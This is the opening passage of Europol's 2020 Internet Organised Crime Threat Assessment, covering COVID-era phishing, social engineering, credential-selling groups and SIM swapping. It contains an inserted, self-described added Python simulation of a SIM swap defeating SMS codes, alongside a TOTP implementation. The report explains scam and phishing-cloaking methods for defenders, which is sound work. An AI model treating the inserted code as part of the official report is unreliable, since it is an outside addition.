INTERNET ORGANISED CRIME THREAT ASSESSMENT (IOCTA) 2020

© European Union Agency for Law Enforcement Cooperation 2020.

Reproduction is authorised provided the source is acknowledged. For any use or reproduction of individual photos, permission must be sought directly from the copyright holders. This publication and more information on Europol are available on the Internet.

www.europol.europa.eu
Contents

Foreword 04
Abbreviations 05
Executive summary 06
Key findings 08
Introduction 10

1 Cross-cutting crime facilitators and challenges to criminal investigations 11
1.1 Introduction
1.2 COVID-19 demonstrates criminal opportunism
1.3 Data compromise
1.4 Cryptocurrencies facilitate payment for all forms of cybercrime
1.5 Challenges with reporting plague ability to create accurate overview of crime
1.6 Law enforcement access to data continues to challenge investigations

2 Cyber-dependent crime 23
2.1 Introduction
2.2 Ransomware
2.3 Malware
2.4 DDoS

3 Child sexual exploitation online 34
3.1 Introduction
3.2 The amount of online child sexual abuse material continues to increase
3.3 Criminals increasingly encrypt their communications complicating investigations
3.4 Darkweb offender communities are continuously evolving
3.5 Livestreaming is becoming mainstream
3.6 Commercialisation of online CSE is an emerging threat
3.7 Online child sexual abuse to remain significant threat

4 Payment fraud 42
4.1 Introduction
4.2 Increase in SIM swapping and SMishing
4.3 Business Email Compromise remains a threat and growing area of concern
4.4 Online investment fraud draws in victims all over Europe
4.5 Card-not-present fraud continues to increase as criminals diversify
4.6 Terminal attacks increase as popularity of black-box attacks soars

5 The criminal abuse of the Darkweb 54
5.1 Introduction
5.2 Marketplace developments
5.3 Administrators and users adapt as they aim to enhance security and resilience
5.4 Infrastructure preferences remain stable, but criminals do use alternatives
5.5 Privacy enhancing wallets emerge as top threat, as privacy enhancing coins gain popularity
5.6 Surface web platforms offer an additional dimension to Darkweb trading
5.7 Steady supply of diverse Darkweb market items

Recommendations 60
References 62
Foreword

Catherine De Bolle
Executive Director of Europol

I am pleased to introduce the Internet Organised Crime Threat Assessment (IOCTA) 2020.

The IOCTA is Europol's flagship strategic product highlighting the dynamic and evolving threats from cybercrime. It provides a unique law enforcement-focused assessment of emerging challenges and key developments in the area of cybercrime. We are grateful for the many contributions from our colleagues within the European law enforcement community and to our partners in the private industry for their input to the report. Combining law enforcement and private sector insights allows us to present this comprehensive overview of the threat landscape.

The data collection for the IOCTA 2020 took place during the lockdown implemented as a result of the COVID-19 pandemic. Indeed, the pandemic prompted significant change and criminal innovation in the area of cybercrime. Criminals devised both new modi operandi and adapted existing ones to exploit the situation, new attack vectors and new groups of victims.

The analysis for the IOCTA 2020 clearly highlights cybercrime as a fundamental feature of the European crime landscape. Cybercrime remains among the most dynamic forms of crime encountered by law enforcement in the EU. While ransomware, business email compromise and social engineering are familiar cybercrime threats, their execution evolves constantly and makes these criminal activities more complex to detect and to investigate. Ransomware in particular remains a priority threat encountered by cyber investigators across the EU. The amount of online child sexual abuse material detected continues to increase, further exacerbated by the COVID-19 pandemic, which has had serious consequences for the investigative capacity of law enforcement authorities.

Europol is at the forefront of law enforcement innovation and offers various policing solutions in relation to encryption, cryptocurrencies and other challenges. The European Cybercrime Centre (EC3) at Europol is the platform of choice for cybercrime investigators across the EU and beyond to connect, collaborate and communicate.

The case studies illustrating this report demonstrate the necessity and effectiveness of international law enforcement cooperation in tackling cybercrime as well as the vital role played by private-public partnerships in this area. Europol provides an ideal framework for these different stakeholders to come together, exchange information and take concerted action.

Cybercrime affects citizens, businesses and organisations across the EU. Europol plays a key role in countering cybercrime by working with our many partners in law enforcement and the private sector and by offering innovative solutions and effective, comprehensive support to investigations. I hope this analysis can inform effective responses to these evolving threats and make Europe safer.
Abbreviations

AaaS  Access-as-a-Service
AI  Artificial Intelligence
ATM  Automated teller machine
BEC  Business email compromise
BPH  Bulletproof hosting
CaaS  Cybercrime-as-a-Service
C&C  Command & control
CNP  Card-not-present
CSAM  Child sexual abuse material
CSE  Child sexual exploitation
DDoS  Distributed Denial of Service
DNS  Domain Name System
DoH  DNS over HTTPS
E-commerce  Electronic commerce
EC3  Europol's European Cybercrime Centre
E-skimming  Electronic skimming
GDPR  General Data Protection Regulation
HTML  Hypertext Markup Language
HTTP  Hypertext Transfer Protocol
HTTPS  Hypertext Transfer Protocol Secure
IOCTA  Internet Organised Crime Threat Assessment
IoT  Internet of Things
IP  Internet protocol
ISP  Internet service provider
IT  Information technology
J-CAT  Joint Cybercrime Action Taskforce
KYC  Know your customer
LDCA  Live distant child abuse
MaaS  Malware-as-a-Service
NCMEC  The National Center for Missing and Exploited Children
OTP  One time password
PC  Personal computer
PGP  Pretty Good Privacy
POS  Point of sale
P2P  Peer-to-peer
RaaS  Ransomware-as-a-Service
RATs  Remote access tools
RDP  Remote desktop protocol
SIM  Subscriber identity module
SQL  Structured query language
Tor  The onion router
VIDTF  Victim Identification Taskforce
VPN  Virtual private network
VPS  Virtual private server
2FA  Two-factor authentication

Executive summary

The threat landscape over the last year described in the IOCTA 2020 contains many familiar main characters. The starring roles in terms of priority threats went to the likes of social engineering, ransomware and other forms of malware. Several interviewees captured the essence of the current state of affairs of the threat landscape by stating: cybercrime is an evolution, not a revolution. As time passes, the cyber-element of cybercrime infiltrates nearly every area of criminal activity. Key elements mentioned in previous editions of the IOCTA that return this year merit more, rather than less, attention. The repetition means the challenge still exists and has, in many cases, increased, underlining the need to further strengthen the resilience and response to well-known threats. The IOCTA 2020 makes clear that the fundamentals of cybercrime are firmly rooted, but that does not mean cybercrime stands still. Its evolution becomes apparent on closer inspection, in the ways seasoned cybercriminals refine their methods and make their artisanship accessible to others through crime as a service.

The COVID-19 crisis illustrated how criminals actively take advantage of society at its most vulnerable. Criminals tweaked existing forms of cybercrime to fit the pandemic narrative, abused the uncertainty of the situation and the public's need for reliable information. Across the board from social engineering to Distributed Denial of Service (DDoS) attacks and from ransomware to the distribution of child sexual abuse material (CSAM), criminals abused the crisis when the rest of society was trying to contain the situation. The opportunistic behaviour of criminals during the pandemic, however, should not overshadow the overall threat landscape. In many cases, COVID-19 caused an amplification of existing problems, exacerbated by a significant increase in the number of people working from home. This is perhaps most noticeable in the area of child sexual abuse and exploitation. As in previous years, the amount of online CSAM detected continues to increase, further exacerbated by the COVID-19 crisis, which has had serious consequences for the investigative capacity of law enforcement authorities. In addition, livestreaming of child sexual abuse increased and became even more popular during the COVID-19 crisis; a recent case shows production also takes place in the EU.

Data compromise once more features as a central aspect throughout a number of threats. Both law enforcement and private sector representatives consistently report on social engineering among the top threats. With regard to social engineering, in particular phishing, cybercriminals are now employing a more holistic strategy by demonstrating a high level of competency when exploiting tools, systems and vulnerabilities, assuming false identities and working in close cooperation with other cybercriminals. However, despite the trend pointing towards a growing sophistication of some criminals, the majority of social engineering and phishing attacks are successful due to inadequate security measures or insufficient awareness of users. Attacks do not necessarily have to be refined to be successful.

The developments in the area of non-cash payment fraud over the past twelve months reflect the overall increase in sophistication and targeting of social engineering and phishing. Fuelled by a wealth of readily available data, as well as a Cybercrime-as-a-Service (CaaS) community, it has become easier for criminals to carry out highly targeted attacks. As a result, law enforcement and industry continue to identify well-established frauds as a major threat.

Subscriber identity module (SIM) swapping is one of the new key trends this year, having caused significant losses and attracted considerable attention from law enforcement. As a highly targeted type of social engineering attack, SIM swapping can have potentially devastating consequences for its victims, by allowing criminals to bypass text message-based (SMS) two-factor authentication (2FA) measures and gain full control over their victims' sensitive accounts.

Business Email Compromise (BEC) continues to increase. As criminals are more carefully selecting their targets, they have shown a significant understanding of internal business processes and systems' vulnerabilities. At the same time, certain other forms of fraud have entered the spotlight due to the sheer number of victims they have generated.
The spread of online investment fraud all over Europe is not necessarily new but has generated increased law enforcement attention as victims at times lose their life savings to professional organised criminal groups that have incorporated cyber elements into their scams.

The clear majority of law enforcement respondents once again named ransomware as a top priority threat. Although this point has been made in past editions of the IOCTA, ransomware remains one of the, if not the, most dominant threats, especially for public and private organisations within as well as outside Europe. Considering the scale of damage that ransomware can inflict, victims also appear to be reluctant to come forward to law enforcement authorities or the public when they have been victimised, which makes it more difficult to identify and investigate such cases. Criminals continued making their ransomware attacks increasingly targeted. Ransomware has been shown to pose a significant indirect threat to businesses and organisations, including in critical infrastructure, by targeting supply chains and third-party service providers. Perhaps one of the most crucial developments is the new way of pressuring victims to pay by stealing and subsequently threatening to auction off victims' sensitive data.

Besides ransomware, European law enforcement reported malware in the broader sense to be widely present in cybercrime cases. Criminals have converted some traditional banking Trojans into more advanced modular malware to cover a broader scope of functionality. These evolved forms of modular malware are a top threat in the EU, especially as their adaptive and expandable nature makes them increasingly more complicated to combat effectively.

The range of threat actors makes drawing general conclusions about particular threats challenging. In areas ranging from social engineering and phishing to ransomware and other forms of malware, law enforcement authorities witness a broad spectrum of threat actors. These actors vary in terms of level of skill, capability and adaptability. The top tier criminals manage to run their operations like a professional enterprise, whereas less sophisticated threat actors tend to rely on off-the-shelf materials to conduct their criminal activities. The availability of the materials through CaaS, however, continues to make such activities accessible. Moreover, across the board threat actors in different types of cybercrime demonstrate their resilience. Perhaps more importantly, in areas such as the Darkweb, criminals have enhanced their cooperation and joined forces to provide a response to shared challenges. This means they are able to make their business more robust and in particular incorporate better security solutions to ensure that law enforcement are unable to trace them. Overall, cybercriminals are showing an improved level of operational security and proving to be highly aware of how to hide their identities and criminal activities from law enforcement or private sector companies. With cryptocurrencies, criminals also manage to complicate law enforcement's ability to trace payments connected to criminal activities.

To respond to the cybercrime challenges in a more effective manner, a number of key ingredients are essential. First, information sharing is at the heart of any strategic, tactical and operational response regardless of the specific type of cybercrime. Sharing information, which needs to be purpose-driven and actionable, requires reliable coordination and cooperation from public and private partners. At the same time, information sharing requires a legal framework and attitude that is sensitive to the timely exchange of information, which is crucial as cybercriminals can move their infrastructure within the blink of an eye. This is particularly evident in the criminal abuse of the Darkweb, where short lifecycles of marketplaces influence law enforcement's ability to conduct investigations. There is also the need to foster a culture of acceptance and transparency when organisations or individuals fall victim to cybercrime. Re-victimising victims after a cyber-attack is counterproductive and a significant challenge, as law enforcement need companies and individuals who have been the subject of a crime to come forward. This can help resolve the challenges in reporting we currently face. Besides information sharing through enhanced coordination and cooperation, other key elements to include in an effective response are prevention and awareness, and capacity building. We can reduce the success rate of many forms of cybercrime by educating individuals and organisations in recognising criminal activity before they fall victim to it. It is worth underlining the importance of the responsibility of industry in integrating security and privacy in their design as fundamental principles, instead of shaming end users as the weakest link. Through capacity building, on the other hand, law enforcement across different crime areas will be able to understand and respond to the cyber-element of crimes. Finally, taskforce work such as coordinating and de-conflicting law enforcement operational response, for which the Europol Joint Cybercrime Action Taskforce (J-CAT) platform is vital, continues to play a key role in the current cybercrime landscape.
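The SIM swapping passage of this executive summary states that the attack lets criminals bypass SMS-based 2FA. The following Python model is an added example, not part of the Europol report, showing why the bypass works: the bank's login step only ever talks to a phone number, and the carrier delivers the code to whoever currently holds the SIM for that number, which is exactly the mapping a SIM swap rewrites. For contrast, and going beyond the report's text, it also implements the RFC 4226 HOTP / RFC 6238 TOTP algorithms, where the code derives from a secret held on the user's device and the verifier never consults the carrier. The Carrier and SmsOtpLogin classes, the phone number and the party names are constructed for illustration; the 20-byte secret in the usage is the RFC test secret.

```python
import hashlib
import hmac
import secrets
import struct

# Constructed model (not from the report) of the delivery path of an SMS one-time
# password: the carrier maps a phone number to whoever holds the SIM, and the bank's
# login step only ever addresses the number. A SIM swap rewrites that mapping.


class Carrier:
    """Hypothetical mobile operator: number -> SIM holder, plus each holder's inbox."""

    def __init__(self):
        self.holder_of = {}  # phone number -> holder name
        self.inbox = {}      # holder name -> list of SMS texts received

    def register(self, number, holder):
        self.holder_of[number] = holder
        self.inbox.setdefault(holder, [])

    def sim_swap(self, number, new_holder):
        # The attack step: a socially engineered customer-service agent ports the
        # victim's number onto a SIM the attacker controls.
        self.holder_of[number] = new_holder
        self.inbox.setdefault(new_holder, [])

    def send_sms(self, number, text):
        self.inbox[self.holder_of[number]].append(text)


class SmsOtpLogin:
    """Second factor after a (stolen) password: a 6-digit code texted to the number on file."""

    def __init__(self, carrier, number_on_file):
        self.carrier = carrier
        self.number = number_on_file
        self.pending = None

    def start(self):
        self.pending = f"{secrets.randbelow(10 ** 6):06d}"
        self.carrier.send_sms(self.number, f"Your login code is {self.pending}")

    def finish(self, submitted):
        ok = self.pending is not None and hmac.compare_digest(submitted, self.pending)
        self.pending = None  # codes are single use
        return ok


def sim_swap_defeats_sms_otp():
    """True when the attacker, holding the swapped number, passes SMS 2FA while the
    victim's handset receives nothing."""
    carrier = Carrier()
    carrier.register("+31600000001", "victim")  # constructed number
    login = SmsOtpLogin(carrier, "+31600000001")
    carrier.sim_swap("+31600000001", "attacker")
    login.start()
    code = carrier.inbox["attacker"][-1].split()[-1]  # attacker simply reads the text
    return login.finish(code) and carrier.inbox["victim"] == []


# Contrast, beyond the report's text: an OTP derived from a secret that stays on the
# user's device (RFC 4226 HOTP / RFC 6238 TOTP). The verifier consults only the stored
# secret and the clock, so who holds the phone number is irrelevant.


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226: HMAC-SHA1 over the 8-byte big-endian counter, dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{code % 10 ** digits:0{digits}d}"


def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238: HOTP with the counter taken from the clock."""
    return hotp(secret, unix_time // step, digits)


def verify_totp(secret: bytes, submitted: str, unix_time: int, window: int = 1) -> bool:
    """Accept the current 30-second step and `window` steps either side for clock drift."""
    counter = unix_time // 30
    return any(hmac.compare_digest(submitted, hotp(secret, c))
               for c in range(counter - window, counter + window + 1))


if __name__ == "__main__":
    print("SIM swap defeats SMS OTP:", sim_swap_defeats_sms_otp())
    rfc_secret = b"12345678901234567890"  # RFC 4226 / RFC 6238 test secret
    print("TOTP at t=59 with the RFC test secret:", totp(rfc_secret, 59))
```

The SMS flow fails not because the code is weak but because the channel authenticates possession of a number that the carrier can reassign; the device-bound flow has no such third party in the loop, which is the property a recovery or login design should look for.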
Key findings

CROSS-CUTTING CRIME FACILITATORS AND CHALLENGES TO CRIMINAL INVESTIGATIONS

» Social engineering remains a top threat to facilitate other types of cybercrime.
» Cryptocurrencies continue to facilitate payments for various forms of cybercrime, as developments evolve with respect to privacy-oriented crypto coins and services.
» Challenges with reporting hinder the ability to create an accurate overview of crime prevalence across the EU.

CYBER-DEPENDENT CRIME

» Ransomware remains the most dominant threat as criminals increase pressure by threatening publication of data if victims do not pay.
» Ransomware on third-party providers also creates potential significant damage for other organisations in the supply chain and critical infrastructure.
» Emotet is omnipresent given its versatile use and leads the way as the benchmark of modern malware.
» The threat potential of DDoS attacks is higher than its current impact in the EU.

CHILD SEXUAL EXPLOITATION ONLINE

» The amount of online CSAM detected continues to increase, further exacerbated by the COVID-19 crisis, which has serious consequences for the capacity of law enforcement authorities.
» The use of encrypted chat apps and industry proposals to expand this market pose a substantial risk for abuse and make it more difficult for law enforcement to detect and investigate online CSE activities.
» Online offender communities exhibit considerable resilience and are continuously evolving.
» Livestreaming of child sexual abuse continues to increase and became even more prevalent during the COVID-19 crisis.
» The commercialisation of online CSE is becoming a more widespread issue, with individuals uploading material to hosting sites and subsequently acquiring credit on the basis of the number of downloads.

PAYMENT FRAUD

» SIM swapping is a key trend that allows perpetrators to take over accounts and has demonstrated a steep rise over the last year.
» BEC remains an area of concern as it has increased, grown in sophistication, and become more targeted.
» Online investment fraud is one of the fastest growing crimes, generating millions in losses and affecting thousands of victims.
» Card-not-present (CNP) fraud continues to increase as criminals diversify in terms of target sectors and electronic skimming (e-skimming) modi operandi.

THE CRIMINAL ABUSE OF THE DARKWEB

» The Darkweb environment has remained volatile, lifecycles of Darkweb marketplaces have shortened, and no clear dominant market has risen over the past year compared to previous years to fill the vacuum left by the takedowns in 2019.
» The nature of the Darkweb community at administrator level shows how adaptive it is under challenging times, including more effective cooperation in the search for better security solutions and safe Darkweb interaction.
» There has been an increase in the use of privacy-enhanced cryptocurrencies and an emergence of privacy-enhanced coinjoin concepts, such as Wasabi and Samurai.
» Surface web e-commerce sites and encrypted communication platforms offer an additional dimension to Darkweb trading to enhance the overall business model.
Introduction

Aim

The IOCTA aims to inform decision-makers at strategic, tactical and operational levels about the threats of cybercrime. The 2020 IOCTA contributes to setting priorities for the 2021 EMPACT operational action plans, which follow the three current priorities defined as:

1) disrupting criminal activities related to attacks against information systems, particularly those following CaaS business models and working as enablers for online crime;

2) combating child sexual abuse and child sexual exploitation, including the production and dissemination of child abuse material;

3) targeting criminals involved in fraud and counterfeiting of non-cash means of payment, including large-scale payment card fraud (especially card-not-present (CNP) fraud), emerging threats to other non-cash means of payment and enabling criminal activities.

Furthermore, the IOCTA aims to consolidate findings on current cyber threats, which could contribute to the discussion of research and development priorities as well as planning at the EU level.

Scope

The scope of the 2020 IOCTA lies in the threat assessment of the cybercrime landscape, consisting of trends and developments pertinent to the EMPACT priorities mentioned previously. In addition to this, the report will discuss other cross-cutting facilitators and challenges that influence or impact the cybercrime ecosystem, such as criminal abuse of cryptocurrencies and social engineering. This report provides an update on the latest trends and the current impact of cybercrime within the EU and beyond.

Methodological approach

For this year's IOCTA, Europol introduced a different methodological approach to gather data. For previous editions, the team shared a survey with all the Member States and several third-party countries. Each crime priority area received a survey, namely cyber-dependent crime, payment fraud, and child sexual exploitation (CSE). This year, as a means to gather more qualitative and in-depth information, the team conducted interviews with representatives from the Member States and Europol partner countries. The team also conducted interviews with Europol experts from the European Cybercrime Centre (EC3) and members of EC3's three advisory groups on internet security, financial services and telecommunication providers.

The semi-structured interviews contained open questions. As a result, the range of answers was broader than in the previous structured survey approach, in which respondents mainly selected from a drop-down menu. Through using open questions, answers became less comparable in a traditional sense, but rather than a limitation, the team perceived this as an opportunity to illustrate the complexity of cybercrime, especially in connection to establishing a comprehensive threat assessment. The ultimate purpose of the IOCTA is to assist Member States in establishing priorities with respect to cybercrime. This pertains to the type of threats but also concerns other considerations such as how we approach this crime area in terms of analysis.

Cybercrime is inherently complex for a number of reasons. With different perpetrators, different motives, different targets, varying modi operandi, different jurisdictions, etc. there are many variables, which complicate both the ability to gather data as well as the ability to compare findings. Furthermore, the quality of those findings encounters challenges as a result of the ability to register them accurately. These limitations must be taken into consideration with respect to any threat landscape report.

Acknowledgements

Europol would like to extend thanks to all law enforcement and private sector partners who contributed to this report.
1 Cross-cutting crime facilitators and challenges to criminal investigations

KEY FINDINGS

• Social engineering remains an effective top threat to enable other types of cybercrime.
• Cryptocurrencies continue to facilitate payments for various forms of cybercrime, as developments evolve with respect to privacy oriented crypto coins and services.
• Challenges with reporting hamper the ability to create an accurate overview of crime prevalence across the European Union.

1.1 INTRODUCTION

Throughout the interviews, one message was clear: cybercrime is an evolution not a revolution [1]. The fundamentals of cybercrime stay the same, in that cybercrime is not that much different to other forms of more traditional crime.

This is a crucial observation to include in any assessment, especially as the emphasis when discussing cybercrime is often placed on how quickly cybercrime and, in particular, cybercriminals change their tactics. Perpetrators may operate at the speed of the internet, as they are able to quickly move parts of their infrastructure, alter a particular aspect of the code, adapt the functionality, gather more victim data, etc., but these changes do not inherently alter the threat, especially not at the abstract level at which we discuss the threats within the IOCTA. We can also witness the evolution of cybercrime through the integration of the cyber-component into nearly all forms of traditional crime.

Another reason to reflect on this observation is to understand that to combat cybercrime effectively we need to respond to several challenges. Some of these are included within this chapter of the report, whereas others are included within the respective chapters of the different crime areas. Several of these challenges pertain to the ability of law enforcement to execute its core mission of preventing and combatting crime, identifying suspects, protecting victims and arresting perpetrators.

This chapter contains three key components. First, a reflection on overarching threats that are cross-cutting facilitators for other forms of cybercrime. The second part includes a brief description of a general challenge with respect to gathering (accurate) data about the prevalence of specific forms of cybercrime. The third and final part focuses on challenges which pertain to law enforcement agencies' ability to conduct criminal investigations due to societal developments that criminals opportunistically manage to exploit.
1.2 COVID-19 DEMONSTRATES CRIMINAL OPPORTUNISM

While discussions and models have emerged over several decades surrounding the threats posed by a pandemic crisis, the outbreak of COVID-19 has demonstrated the unfortunate impact potential of such crises on our daily lives across the globe. As physical lockdowns became the norm, cybercrime became more popular than before. There is no denying that the arrival of COVID-19 was a crucial factor in any development discussed with respect to 2020. However, COVID-19 in connection to cybercrime needs to be placed within its context. If anything, COVID-19 demonstrated how cybercrime – at its core – remains largely the same but criminals change the narrative. They adapt the specifics of their approach to fit the societal context as a means to enhance their rate of success. This is not new; in many ways this is business as usual. The difference with COVID-19 is that due to the physical restrictions enacted to halt the spread of the virus, with a subsequent increase in working from home and remote access to business resources, many individuals and businesses that may not have been as active online before the crisis became a lucrative target.

Traditional cybercrime activities such as phishing and cyber-enabled scams quickly exploited the societal vulnerability as many citizens and businesses were looking for information, answers and sources of help during this time. There were even more challenges for both individuals and businesses as teleworking during the pandemic became the norm. Europol followed all developments closely and shared its findings through frequent corona strategic reports [2].

Spread of disinformation enhances cybercrime opportunities

The pandemic also gave rise to disinformation campaigns and activities. Disinformation efforts are often associated with hybrid threats, which are defined as threats combining conventional and unconventional, military and non-military activities which may be used by non-state or state actors to achieve political aims [3]. A wide range of measures applied in hybrid campaigns include cyber-attacks and disinformation, disruption of critical services, undermining of public trust in governmental institutions and exploiting social vulnerabilities. The presence of disinformation became a crucial feature in the overall threat landscape during the crisis. Many Member States reported problems with respect to the spread of disinformation.

Users become vulnerable and receptive to disinformation and fake news due to the paradoxical oversaturation with available information combined with a perceived lack of trustworthy sources of news that reinforce some of the users' preconceived notions and beliefs. Disinformation can also be linked to cybercrime in efforts to make social engineering and phishing attacks more impactful.

Both seasoned cybercriminals and opportunistic individuals spread disinformation to benefit from it in different ways. Significant political motives can drive disinformation to influence elections or referendums affecting entire countries. However, for criminals the ultimate aim is always to obtain profit. Some individuals simply seek to obtain direct financial gain through digital advertisements, as engagement with fake news messages about COVID-19 can be very high. The number of new domains and websites related to COVID-19 soared at the start of the pandemic [4].

Another strategy to profit financially from the COVID-19 crisis was to spread fake news about potential cures for the virus or effective prevention measures. Such messages also facilitated criminals seeking to sell items that they claim will help prevent or cure COVID-19, which emerged both on the Clearnet and the Darkweb.

The hybrid nature of this threat underlines the importance of a combined, hybrid response, especially considering that law enforcement agencies are not typically mandated with investigating cases involving disinformation or fake news, despite their potential to bolster criminal activities.

SAFE TELEWORKING (infographic)

FOR BUSINESSES
• Establish corporate policies and procedures
• Provide secure remote access
• Secure your corporate communications
• Keep device operating systems and apps updated
• Regularly check in with staff
• Raise staff awareness about the risks of teleworking
• Increase your security monitoring

FOR EMPLOYEES
• Access company data with corporate equipment
• Think before connecting
• Secure your teleworking equipment
• Use secure remote access
• Develop new routines
• Protect your teleworking equipment and environment
• Keep business and leisure apart
• Be careful when using private devices for telework
• Stay alert
• Report suspicious activity
• Avoid giving out personal information

1.3 DATA COMPROMISE

The majority of threats discussed within the IOCTA ultimately pertain to some form of data compromise. As a result, data compromise is not dealt with as a separate category within the different chapters but rather emphasised within this cross-cutting chapter. Data compromise gathers significant attention through the obligation of organisations to report data breaches under the General Data Protection Regulation (GDPR). GDPR considers the protection of data belonging to EU citizens, thus it has an ‘extra-territorial effect’ applying to companies outside the EU who handle data relating to EU visitors⁵. Since the enactment of GDPR, over the past 18 months over 160 000 data breach notifications have been handed in to authorities⁶, and there has been a growth in interest over personal data handling among EU citizens⁷. In its annual data breach investigations report, Verizon reports how the company collected 157 525 incidents and 108 069 breaches⁸. The authors, however, immediately place these figures within their proper context, as 100 000+ of those breaches concerned credentials of individual users. These are breaches where criminals target the users’ credentials to gain access to bank accounts, cloud services, etc.

Data compromise therefore can refer to the ability of criminals to access individual user credentials or to access large databases with potentially valuable information. Examples of the latter include data breaches at companies that often become public knowledge. Both of these situations are not mutually exclusive, and often form a starting point for subsequent criminal activity. The majority of interviewees from law enforcement authorities and private sector representatives mentioned social engineering as a top threat, which cuts across different crime areas, affecting both cyber-dependent and cyber-enabled crime, and illustrates the key role played by data compromise.

Social engineering

Social engineering and phishing remain a key threat. Based on interviewee responses, both demonstrate a significant increase in volume and sophistication. While some of the increase may be attributable to improved reporting mechanisms, it has also become easier for technically inexperienced criminals to carry out phishing campaigns using existing criminal infrastructure and support services – a trend that is expected to continue in the future.

Law enforcement case study

European law enforcement conducted an investigation of ten cases of fraud related to technical support scams. The perpetrators initially communicated mainly via telephone with their victims, pretending to be technicians at a software company support centre. Under the pretext that their computer and/or mobile device are "infected" by malware, criminals asked the victims to install remote access software to allegedly solve the issue. In this way, the criminals gained full access to the computer or mobile device and consequently to the personal data stored on the devices. Through use of the personal data, the perpetrators transferred money from the electronic bank accounts (e-banking) to bank accounts controlled by themselves or their accomplices. In many cases, they even demanded the installation of remote management programmes on the victims’ mobile phones, so that they could receive text messages (SMS) with the one-use codes (OTPs), which financial institutions send for security reasons. The investigation identified four individuals who were active or involved as money mules.

Targeting human weakness in the security chain, social engineering and phishing have a high impact on society and enable the majority of cybercrimes, ranging from scams and extortion to the acquisition of sensitive information and the execution of advanced malware attacks.

While criminals typically employ social engineering to convince targets to engage in fraudulent schemes unknowingly, criminals use phishing to either distribute malware or to obtain credentials and gain access to sensitive accounts and systems.

More sophisticated and more targeted phishing

A key trend over the past year relates to the growing sophistication⁹ of phishing. Phishing has become more difficult to detect, with many phishing emails and sites being almost identical to the real ones. At the same time, phishing campaigns have become faster and more automated, forcing respondents to act quicker than before, as in some cases it takes one day from a credential leak to an attack.

Overall, cybercriminals are employing a more holistic strategy to phishing by showing a high level of competency concerning the use of tools, systems and vulnerabilities they exploit, assuming false identities and working in close cooperation with other cybercriminals. Regarding the latter, criminals have shown their sense for innovation, as they use shared platforms to distribute their scams, which makes blocking or tracing difficult for incident responders. Criminals have also been observed maintaining a level of situational awareness, with a number of phishing campaigns having taken advantage of the COVID-19 pandemic¹⁰.

Further to this, criminals have also employed a much more targeted approach when attacking their victims. Advanced actors focus more on selected victims as opposed to a random group in order to optimise financial gains, as they are becoming increasingly specialised in information gathering and victim profiling activities. As the main threat relates to spear phishing, criminals have proven apt at adapting their attacks to a specific context for fraud schemes in particular, for instance by improving their language skills or even using local ‘customer agents’ who communicate with their victims speaking their regional accents, or by making reference to current cultural, political, and local events.

[Infographic: Fake news. COVID-19 disinformation can endanger people’s lives: fake products and services; mistrust in official guidelines; false mitigation and cures. Break the chain: do not engage (do not comment or share); spot the fake; report it; share information from official sources only.]

In addition to employing a targeted approach, cybercriminals are adopting a more agile approach, constantly looking to harvest data and sensitive information from victims, which they can use to enable additional crimes. Lack of security awareness and a significant amount of open-source intelligence surrounding personal information of employees of businesses available online enable criminals to gather the information they need. Other forms of personal information harvested and abused by criminals may include financial and personal details, as well as login credentials for various sensitive accounts.

The majority of social engineering and phishing attacks are successful due to inadequate security measures, potentially in combination with a lack of awareness by the users. Particularly the latter was highlighted repeatedly, as attacks do not have to be necessarily complicated or advanced to be successful – badly set up attacks still succeed by exploiting people as the weak part of the security chain. Accordingly, basic cyber hygiene and improved user awareness are some of the key success factors in curbing part of this threat.

Finally, cybercriminals are demonstrating an improved overall level of operational security and proving to be highly aware of how to hide their identities and criminal activities from law enforcement or private sector companies. In some cases, once a phishing attempt is being investigated, the whole criminal infrastructure has already vanished. Similarly, criminals may put in place technical measures to avoid suspicion. Through their deny/allow¹¹ lists of internet protocol (IP) addresses, for instance, criminals may forward the user to the genuine website if certain conditions are met (i.e. access through a computer instead of a mobile phone, or from a foreign IP address). As such, only the users selected as targets by criminals are re-routed to the phishing site.

CaaS as a facilitator of phishing and other forms of cybercrime

Cybercrime-as-a-Service (CaaS) facilitates phishing. Offerings on the Darkweb help criminals significantly improve the overall technical complexity of their attacks without the need for advanced technical understanding. In recent years, CaaS has increasingly enabled even technically inexperienced criminals to carry out phishing campaigns by providing exploit kits, access to compromised systems and vulnerable remote desktop protocols (RDPs).

Here, criminals have also been reported to make increased use of legitimate commercial services such as encrypted email and messaging applications as well as virtual private network (VPN) providers to hide criminal activity, exploiting increasingly privacy-oriented policies, which make it difficult for law enforcement to gain relevant information in time. Often, these less obvious legitimate services are safer for criminals to use and minimise risks associated with using underground services more commonly used by criminals in the past.

Bust of hacker group selling databases with millions of user credentials

Polish and Swiss law enforcement authorities, supported by Europol and Eurojust, dismantled InfinityBlack, a hacking group involved in distributing stolen user credentials, creating and distributing malware and hacking tools, and fraud.

On 29 April 2020, the Polish National Police searched six locations in five Polish regions and arrested five individuals believed to be members of the hacking group InfinityBlack. Police seized electronic equipment, external hard drives and hardware cryptocurrency wallets, all worth around €100 000. The police closed down two platforms with databases containing over 170 million. The hacking group created online platforms to sell user login credentials known as ‘combos’. The group was efficiently organised into three defined teams. Developers created tools to test the quality of the stolen databases, while testers analysed the suitability of authorisation data. Project managers then distributed subscriptions against cryptocurrency payments.

The hacking group’s main source of revenue came from stealing loyalty scheme login credentials and selling them on to other, less technical criminal gangs. These gangs would then exchange the loyalty points for expensive electronic devices.

The hackers created a sophisticated script to gain access to a large number of Swiss customer accounts. Although the losses are estimated at €50 000, hackers had access to accounts with potential losses of more than €610 000. The fraudsters and hackers, among them minors and young adults, were unmasked when using the stolen data in shops in Switzerland.

1.4 CRYPTOCURRENCIES FACILITATE PAYMENT FOR ALL FORMS OF CYBERCRIME

The abuse of cryptocurrencies continues to play an important role in facilitating payments for transactions across all areas of cybercrime. Reliability, irreversibility of transactions and a perceived degree of anonymity have made cryptocurrencies the default payment method for victim-to-criminal payments in ransomware and other extortion schemes, as well as criminal-to-criminal payments on the Darkweb. These activities have been long established, with Silk Road emerging in 2011 and Cryptolocker hitting its first victims in 2013.

